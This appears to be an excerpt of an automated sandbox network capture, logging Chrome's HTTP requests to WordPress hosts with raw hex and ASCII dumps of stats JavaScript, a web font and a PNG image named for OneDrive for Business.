                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 70 22 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 2c 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 47 65 6e 65 72 61 6c 22 2c 6e 65 78 74 75 73 65 72 69 64 3a 74 2c 6e 65 78 74 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 2c 70 72 65 76 75 73 65 72 69 64 3a 63 2c 70 72 65 76 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 7d 29 29 7d 6b 28 22 61 69 22 2c 74 29 2c 63 3d 74 2c 75 3d 22 61 6e 6f 6e 22 7d 65 6c 73 65 20 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 22 2c 61 6e 6f 6e 49 64 3a 74 7d 29 7d 2c 72 65 63 6f 72 64 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 5f 73 65 74 50 72 6f 70 65 72 74 69 65 73 22 21 3d 3d 74 26 26 28 28 65 3d 65 7c 7c 7b 7d 29 2e 5f 65 6e 3d 74 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79
                                                                                                                                                                                                                                                Data Ascii: p",e.join(",")),h({_en:"_aliasUserGeneral",nextuserid:t,nextuseridtype:"anon",prevuserid:c,prevuseridtype:"anon"}))}k("ai",t),c=t,u="anon"}else h({_en:"_aliasUser",anonId:t})},recordEvent:function(t,e,n){"_setProperties"!==t&&((e=e||{})._en=t,"string"==ty
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 6e 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 3f 6f 28 74 2c 65 29 3a 76 6f 69 64 20 30 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74
                                                                                                                                                                                                                                                Data Ascii: tring.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(n):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?o(t,e):void 0}}},function(t,e){t.exports=function(t,e){(null==e||e>t
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 61 28 29 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 3b 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 74 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 6e 61 6d 65 29 7b 69 66 28 22 68 74 74 70 3a 22 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 2b 22 3a 38 30 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 68 74
                                                                                                                                                                                                                                                Data Ascii: f("object"!==a()(n.parentNode))return;n=n.parentNode}if(function(t){var e=document.location;if(e.host===t.host)return!0;if(""===t.host)return!0;if(e.protocol===t.protocol&&e.host===t.hostname){if("http:"===e.protocol&&e.host+":80"===t.host)return!0;if("ht
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 65 5d 29 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 6e 65 77 20 49 6d 61 67 65 3b 6f 2e 73 72 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 22 2b 74 2b 22 3f 22 2b 65 2b 22 26 72 61 6e 64 3d 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 6f 2e 61 6c 74 3d 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 28 6f 2e 69 64 3d 6e 2c 70 28 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 70 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: codeURIComponent(t[e]));return n.join("&")},l=function(t,e,n){var o=new Image;o.src=document.location.protocol+"//pixel.wp.com/"+t+"?"+e+"&rand="+Math.random(),o.alt="","string"==typeof n&&document.body&&(o.id=n,p(n),document.body.appendChild(o))},p=funct
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC900INData Raw: 2e 67 69 66 22 2c 66 28 74 29 2c 22 77 70 73 74 61 74 73 22 29 7d 2c 65 78 74 72 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 3d 22 77 70 63 6f 6d 2d 6e 6f 2d 70 76 22 2c 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 63 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 54 72 61 63 6b 65 72 49 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 64 2e 69 6e 69 74 28 74 2c 65 29 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                Data Ascii: .gif",f(t),"wpstats")},extra:function(t){t.v="wpcom-no-pv",l("g.gif",f(t),!1)},raw:function(t){l("g.gif",f(t),!1)},click:function(t){l("c.gif",f(t),!1)},clickTrackerInit:function(t,e){d.init(t,e)}},y=function t(){document.hidden||(document.removeEventList


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.1149759192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:34 UTC652OUTGET /s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiCZXVigHPVA.woff2 HTTP/1.1
                                                                                                                                                                                                                                                Host: fonts.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:35 GMT
                                                                                                                                                                                                                                                Content-Type: font/woff2
                                                                                                                                                                                                                                                Content-Length: 37648
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                Last-Modified: Mon, 20 Mar 2023 20:28:47 GMT
                                                                                                                                                                                                                                                Age: 65856
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC952INData Raw: 77 4f 46 32 00 01 00 00 00 00 93 10 00 10 00 00 00 01 9d a8 00 00 92 ac 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 82 54 1b 81 b3 48 1c b5 14 06 60 3f 53 54 41 54 44 00 8f 64 11 08 0a 83 a0 14 82 eb 0b 0b 91 72 00 01 36 02 24 03 a3 4e 04 20 05 8e 06 07 d7 77 0c 07 5b 16 79 91 0a d5 62 6c 66 f5 e2 f5 3d 85 a0 a4 4a b7 21 80 ea 66 2b eb 7f f0 4e 37 70 73 07 6d 68 a5 f3 a6 ab 6e 3b b0 b4 2a d8 b1 4f 80 8d 03 40 6c 2a 5d d9 ff ff ff ff ff ff bf 22 59 c4 b8 66 b6 6b 76 ef aa 52 a5 00 1e f1 24 48 f0 70 cb 9d 9c 84 2c 78 69 72 5b a8 eb cb 70 28 e8 31 8e 03 32 72 4c 3e b7 25 8c de 97 a3 8e 05 2b 44 bd b6 38 35 2d af e4 c6 81 06 e7 89 45 ed 78 c6 e5 6a 9f cc 01 b7 aa 83 ed 0e af c9 0d 41 2e b8 7d af a2 74 5e f5 f1 14 4a d0 1f 8a a5
                                                                                                                                                                                                                                                Data Ascii: wOF2TH`?STATDdr6$N w[yblf=J!f+N7psmhn;*O@l*]"YfkvR$Hp,xir[p(12rL>%+D85-ExjA.}t^J
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 67 a4 7c 72 53 91 e7 ed 07 33 a5 0a 16 18 1b 03 87 3a 6d 5a 9f 30 3c f5 a7 d4 01 6c 10 05 17 59 8e 2c b9 02 53 71 9d 9f e6 d9 f6 b6 47 22 cd 84 44 e2 ff c0 2e 90 48 24 d2 37 99 7e 93 89 72 c6 c4 39 63 6a 9c 4d c4 12 89 c4 d9 94 b3 29 89 44 22 01 ff fe 4f 77 bb 8d a3 23 87 84 f7 bb 86 42 38 ac 05 9e de 69 46 fe da 5a 69 64 8f 4b 57 b2 da d2 d2 3b ce 0b 61 07 30 bf e9 dd 5e 5f d4 be c4 94 81 cf 5d 08 03 31 62 c6 f5 a8 51 a3 46 2d 26 d4 a8 45 a9 51 63 62 a2 c6 c4 c4 c4 c4 c4 c4 14 65 8a 32 31 31 31 45 79 ef c5 93 9f df 21 dd f3 33 fe 14 45 51 14 45 51 14 05 ff 8d 46 d1 68 34 1a 8d 20 3d 3f 69 52 c0 6a 93 52 c5 4a 58 c6 89 cd 07 34 9f c0 92 d9 e8 6f 4d 4d 9d 44 a6 f0 2f b9 4c 53 70 ec c7 f1 78 05 c8 32 1a 02 3c a5 d4 79 cf e2 b6 50 12 d0 f2 e6 f7 d4 31 1f 9d
                                                                                                                                                                                                                                                Data Ascii: g|rS3:mZ0<lY,SqG"D.H$7~r9cjM)D"Ow#B8iFZidKW;a0^_]1bQF-&EQcbe2111Ey!3EQEQFh4 =?iRjRJX4oMMD/LSpx2<yP1
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: a5 02 14 2a 7f 45 15 e1 53 c4 c1 84 44 c0 61 d0 8f 91 17 30 48 b6 54 60 01 94 9f 0e 8d 4a 21 bb 3d 90 bc e5 77 0e 91 67 d7 76 05 63 de 07 dc e5 96 dd eb 38 bc 62 c4 77 b9 e4 de 6e 5f 82 02 fd 66 99 d5 a0 d5 9f 5c 6a c8 56 16 32 a6 47 8b 5a 22 3c 97 25 0e ca f0 fe 79 ab ae ec f0 df cf 68 7f ba f7 ee 77 76 2f d7 ef d4 5e 7f 20 2d 7b 6b 55 f3 80 9f f7 d3 f3 6f fb b3 b8 a1 c0 bb dd 5b bd de 2b bd d8 73 3d dd 13 e3 01 77 7d fe 96 47 65 5f 65 7c 3f 13 e5 a4 04 6c 12 17 a5 85 ec a4 45 1e 37 be e4 b3 97 d0 78 61 d1 cc 06 2d b7 12 ba 42 d6 f7 c2 89 f0 2b 71 c9 9b 2f 89 98 eb a5 20 1c da b1 01 e8 ca d1 ea 72 e9 33 2f f1 a0 48 1a b0 76 cd 97 3c ea 12 4a 5c e3 46 ac 71 a3 b1 fd a0 5d e4 05 0a 90 f2 55 45 1c 4c 48 04 1c 06 85 80 3f 86 5e 64 4b 05 16 40 79 74 68 54 0a
                                                                                                                                                                                                                                                Data Ascii: *ESDa0HT`J!=wgvc8bwn_f\jV2GZ"<%yhwv/^ -{kUo[+s=w}Ge_e|?lE7xa-B+q/ r3/Hv<J\Fq]UELH?^dK@ythT
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 93 6a 4a 89 a4 dc 5a a4 cf 28 40 ed e1 09 3f 26 c0 c7 33 57 bb e6 68 5d 76 7b e1 a2 c5 a2 db 9c de 14 37 70 1d 34 d4 42 19 dc ec 65 97 5d 42 44 28 94 c6 17 bf e5 bf 02 76 d3 b9 e1 d3 c2 68 c6 da c6 19 68 a7 60 78 52 ef 3e 82 18 00 0e 0a 4c 3d 95 ce f7 51 4c 21 d9 a4 06 fe be 8e 71 94 cd 2a e6 a5 31 a0 ac ab 59 2a f0 ca ba 06 3a 4e 5d 30 2e e8 f2 c0 37 cc ad 17 65 04 f5 d9 db 87 9d a3 39 fc 05 d4 e5 15 3a 2e 92 fb 3c 2a 72 07 6e 02 d2 09 c0 c1 fc 6d 00 28 08 30 10 d9 43 a9 11 c0 02 78 99 7a 4b 9a f7 ea 61 8a 64 6e c7 4b 9d 47 e7 88 08 c6 a7 33 1d 74 20 da ca 57 ac e6 0a ee aa 39 96 13 c8 a1 87 6c 32 78 3b d0 50 d4 90 98 3e 44 19 1e 6c 58 47 d2 4f 27 2d 60 e9 0f 8e e4 15 44 35 a5 44 c8 25 3d 80 e3 16 9e b0 e3 f5 2b 89 1e 02 f7 6d e1 5d 32 17 df 3d cc 61 5d
                                                                                                                                                                                                                                                Data Ascii: jJZ(@?&3Wh]v{7p4Be]BD(vhh`xR>L=QL!q*1Y*:N]0.7e9:.<*rnm(0CxzKadnKG3t W9l2x;P>DlXGO'-`D5D%=+m]2=a]
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: f4 62 64 8c b5 ac e2 2d 9d c5 89 92 7d 0f 7c ae ab 26 1d 7f 52 6f fb 4f 12 78 6f 96 8a 94 d9 f0 c8 99 90 a9 52 52 b9 ca b5 e7 2b 17 a9 1b 25 cf 56 96 a7 d0 37 fb 42 da 96 94 ac c4 e3 ea 7c 4a 27 6a cc f7 14 b1 1c cf 15 b0 d5 f5 87 f7 41 fa e1 0b d9 41 96 d7 e3 87 68 70 11 37 13 71 0d 8a d7 a1 58 e2 82 3e b5 ae a2 64 3a e7 fc 9d 2e ef fb 33 fd 7e b2 da e1 a0 f1 20 70 8d 07 00 de ba 1a 0f 5a a2 45 6c 7d ec ea 27 df 62 ff 4e 29 b7 33 18 dd 96 6c 13 48 47 93 8c 91 8e f9 e5 4a 3f c4 8f 64 b4 24 bb a4 79 b2 19 4a 4e c9 29 fd 0f 87 39 08 a7 db 8e 1b 24 b4 8d 89 fa ff 53 83 2f 84 41 8d 17 a5 d8 64 47 ae b5 10 74 21 64 9e d9 f6 e2 c0 c4 d6 97 f7 ef 70 ff 67 bd 57 9b 79 70 70 02 40 86 4e 24 00 8b cb ee 25 96 96 6a e5 3f 65 f1 5b db 6f 61 84 70 b1 c1 37 6f 24 8e 65
                                                                                                                                                                                                                                                Data Ascii: bd-}|&RoOxoRR+%V7B|J'jAAhp7qX>d:.3~ pZEl}'bN)3lHGJ?d$yJN)9$S/AdGt!dpgWypp@N$%j?e[oap7o$e
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 01 35 71 ff 42 82 f1 fd a9 85 9f b0 3f f7 f0 48 18 0c e2 ab ac d4 ca 3a b9 3c 76 45 56 56 6e 65 d1 d2 f7 1a db e6 12 cd 52 f1 d5 ab 71 32 8a 4c 55 ec e9 74 09 58 1e ea 89 67 85 5b c5 da 74 1d 89 5f 1a 9b f4 aa fd c3 d3 ac bf 79 19 ee 8c e8 0b ab ad ac ca e5 b1 76 0f 9d 15 70 1d 25 bf 22 ef 2b cb 03 12 dd e8 8c 04 4a 24 5d fe 58 52 a2 15 23 69 b1 8a 93 ac 78 c3 25 4b 34 4a 8a 19 ef 10 fc 0e 16 64 4b 70 c1 38 b7 de 49 89 d0 52 26 60 7a e8 4a 79 39 9f 1c f2 8f a2 41 65 f6 15 dc d1 bf 0d 0f 8c eb ca 93 80 42 24 f1 0c 20 87 81 dc 60 10 f9 0c a6 90 21 14 31 94 12 86 51 4a 90 32 d2 5b c1 f0 de 66 44 e9 8c 6c 35 a3 7a 97 d1 ad 63 4c ef 33 b6 0d 1f cf b8 36 f5 91 f1 6d 6f bb a9 ed 6c 97 69 83 0b c1 05 66 0c 1e 84 80 fc a1 31 2c 94 8c ae b1 ba 70 eb 60 8c c7 b6 8d
                                                                                                                                                                                                                                                Data Ascii: 5qB?H:<vEVVneRq2LUtXg[t_yvp%"+J$]XR#ix%K4JdKp8IR&`zJy9AeB$ `!1QJ2[fDl5zcL36molif1,p`
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 61 03 c8 be 56 ca 7e d6 69 67 c6 2e cb 39 db a4 c0 59 fb 74 3c 68 41 27 2c 0a f3 85 0d b4 51 bc 58 75 b1 74 13 fe 09 2d c4 c9 a7 c4 64 e7 a7 b3 5c d7 66 38 9c bb 33 9e d2 bd b9 6d c2 e6 da d7 3d ca 96 b2 d3 2c c6 23 24 da 23 2f 14 7b e2 95 61 cf 08 94 ef 2d ad 9a 2d 31 a8 dd 0a 9b c6 ad 0a cb bc 0f 62 e6 ad 4b 98 37 91 ea 72 53 19 f9 cd fc f8 db 0a 55 cc db fe cc db c1 31 db 67 9f 60 2b e4 98 d1 50 62 48 11 33 51 ce 2d 9e 12 84 95 32 ae a2 1c 84 30 54 ce ad 9f 22 25 62 ab 8c 9b 69 0f 61 ae b0 fd 69 17 16 cb b8 0b 5e e2 30 5a d8 1d ed 80 80 18 6e 2f f1 78 e2 d7 88 0b 05 88 06 bb 6b 99 2e 63 6b 7b 37 b4 f5 02 02 98 1f f3 63 7e cc 8f f9 31 bf e7 ff 57 7c 92 18 49 4e 8a 88 8a cf 8b d8 11 61 c9 04 ff c8 ed 8c e3 0f 18 f6 0c 38 c1 8f 9d 47 64 b2 98 6f 42 9b 34
                                                                                                                                                                                                                                                Data Ascii: aV~ig.9Yt<hA',QXut-d\f83m=,#$#/{a--1bK7rSU1g`+PbH3Q-20T"%biai^0Zn/xk.ck{7c~1W|INa8GdoB4
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 8f b4 eb d4 8d a9 d7 9a cb a6 1b a6 a5 19 32 f2 00 12 e6 58 ce a4 cb 94 05 09 2d 17 0e 01 09 84 8e 89 8d 8b 4f 48 4c 4a 4e 49 4d ab 8a 23 a8 00 3c 2c 5c 02 62 32 4a 1a 79 f2 15 b2 58 87 a6 12 5d 8d 07 9a 34 6b d5 a6 43 97 c7 7a 6c d9 08 d5 f6 e3 bc 42 22 c0 32 23 c5 70 94 26 03 1c 02 0a 06 16 1e 11 19 0d 03 0b 07 8f 80 88 84 8c 82 8a 86 5d 35 1b 4f 97 fb df f6 13 16 e7 45 86 28 54 1a 9d c1 64 b1 39 5c 1e 5f 20 14 89 25 52 99 5c a1 74 dd cd 76 b7 3f 1c 4f 67 84 09 85 df 5e 03 fe 07 0e 82 ab 08 a5 8a ee b5 b1 2e 4e d2 2c 7f 78 7c 7a 7e 79 05 24 16 35 0f 31 e5 52 25 84 ba 2e 0a 28 58 bc f9 b2 6e 7b 87 b5 38 bb fd 69 f9 fd 7e 5e 10 25 59 51 35 dd 30 2d db 71 3d 3f 08 a3 38 49 b3 bc 28 ab ba 69 bb 7e 18 a7 79 59 b7 fd 38 87 1a 8b a7 79 65 bc a4 2a 13 1c 98 d3
                                                                                                                                                                                                                                                Data Ascii: 2X-OHLJNIM#<,\b2JyX]4kCzlB"2#p&]5OE(Td9\_ %R\tv?Og^.N,x|z~y$51R%.(Xn{8i~^%YQ50-q=?8I(i~yY8ye*
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 94 82 a0 02 c8 f9 91 5a 4c 4c 57 88 f0 d5 78 58 82 3d 1c 38 c0 ae 0f 24 60 e7 fb 0f ec 6c ff 80 9d ee 2f b0 93 fd 01 76 bc 7b 60 47 fb 15 ec 70 77 c0 0e 76 0b dc e1 61 05 d6 97 7a ac 37 f7 b0 9e d4 62 dd a9 c1 ba 52 85 75 e6 0e d6 91 4a ac 3d e5 58 5b 68 58 6b 6e 61 2d 29 c6 9a 73 13 6b 4a 01 d6 98 3c ac 21 b9 58 7d b2 71 8d 87 65 47 fa 74 36 66 f3 11 b4 3b 25 07 a4 fb 4e 48 d9 c6 e6 b8 e1 a3 22 7c e2 45 cb 2c a0 4c b7 c6 48 93 69 87 19 d0 f7 43 54 e8 f3 83 7f eb 59 88 93 b4 43 5b 6a 8a 5d b9 9f 8e dc 79 02 ac bd e0 b1 2a 10 1f 8d 30 bf 7d 4c b6 72 cd 4a 1d 84 c2 61 bd 3c b5 55 60 bf 2e ea e6 c7 67 b8 e0 a9 7c d7 bc 56 ec e1 14 83 6b 05 22 78 af cc 05 4f e2 c7 0e 33 f0 33 b2 53 20 e3 20 a1 97 09 97 4c 57 11 b5 f3 45 c4 ec d3 4d dc 69 5b 94 7d d0 d8 0f fc
                                                                                                                                                                                                                                                Data Ascii: ZLLWxX=8$`l/v{`Gpwvaz7bRuJ=X[hXkna-)skJ<!X}qeGt6f;%NH"|E,LHiCTYC[j]y*0}LrJa<U`.g|Vk"xO33S LWEMi[}
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC1369INData Raw: 4e 37 27 3d 9e 17 0b de 95 df 6a 71 e0 4d 79 c1 db f2 11 08 91 83 af a9 ec 08 51 2e b5 35 b3 ac 1d 44 3c 66 a4 62 e5 61 de e0 cb 01 c2 d1 67 90 d3 4c 1d c0 db 99 ba 39 df e2 0c ba 9f 97 fa f2 c1 60 3e 5a 2e 37 f8 b9 92 9e 67 d7 db b0 c1 7d 71 53 91 61 8f 32 af 32 23 e1 80 b5 3a a3 48 81 62 36 25 4c 32 c0 a1 10 91 61 a5 49 42 83 87 80 c1 c2 b1 82 be 87 90 02 87 89 9d fd 71 a2 16 67 87 7c 8e b9 03 69 c7 1d d5 57 1d 73 92 da 4e d4 c6 d9 86 a7 d6 c8 dc 37 26 4d 26 e5 91 c9 69 33 3d 5d 76 66 4e 6b de 79 90 19 0d 79 a5 3f eb 86 f3 c9 8b 7c 35 95 6f c6 f3 d9 d3 6c 79 99 3d 73 45 80 c7 45 81 3f 2b 6f af d2 d8 bd c5 df 2a f9 5f e5 e0 60 3d f8 68 13 0a 19 57 14 f0 44 19 2e fb f0 66 3f ee 28 41 46 08 3a 62 30 91 c0 11 29 a8 88 30 8a 1f 93 f8 b3 f4 05 ba f1 44 8e 17
                                                                                                                                                                                                                                                Data Ascii: N7'=jqMyQ.5D<fbagL9`>Z.7g}qSa22#:Hb6%L2aIBqg|iWsN7&M&i3=]vfNkyy?|5oly=sEE?+o*_`=hWD.f?(AF:b0)0D


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.1149760192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC415OUTGET /wp-content/uploads/2024/12/onedrive-for-business.webp HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC385INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:35 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 58105
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 20 Dec 2024 13:11:18 GMT
                                                                                                                                                                                                                                                Expires: Wed, 15 Jan 2025 20:36:32 GMT
                                                                                                                                                                                                                                                X-Orig-Src: 0_imageresize
                                                                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca MISS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                2024-12-20 15:45:35 UTC984INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 20 00 00 01 59 08 02 00 00 00 ef a0 dc 1f 00 00 e2 c0 49 44 41 54 78 da ec dd 75 7c 5d 45 fa 3f f0 67 e6 f8 95 b8 27 4d d2 d4 5d a9 e2 d0 e2 6e c5 61 81 5d 6c d9 05 16 f9 e1 b0 d8 17 59 6c bf b8 2f b0 8b 17 2f 6d f1 d2 96 ba 26 6d 1a 77 bf 2e 47 66 e6 f7 47 4a 25 4d 9b d4 db fd 3e ef 57 d9 d7 6b 93 73 ef 3d 96 73 3e 77 66 ce 33 44 08 01 08 21 84 d0 7e 25 36 fe b7 3f 10 20 78 00 d0 9e 26 e3 2e 40 08 21 b4 df 91 8d ff 21 f4 5f 82 e2 2e 40 08 21 84 10 c2 80 85 10 42 08 21 84 01 0b 21 84 10 42 08 03 16 42 08 21 84 10 c2 80 85 10 42 08 21 84 01 0b 21 84 10 42 08 03 16 42 08 21 84 10 c2 80 85 10 42 08 21 84 01 0b 21 84 10 42 08 03 16 42 08 21 84 10 c2 80 85 10 42 08 21 84 01 0b 21 84 10 42 08 03 16 42 08
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR YIDATxu|]E?g'M]na]lYl//m&mw.GfGJ%M>Wks=s>wf3D!~%6? x&.@!!_.@!B!!BB!B!!BB!B!!BB!B!!BB
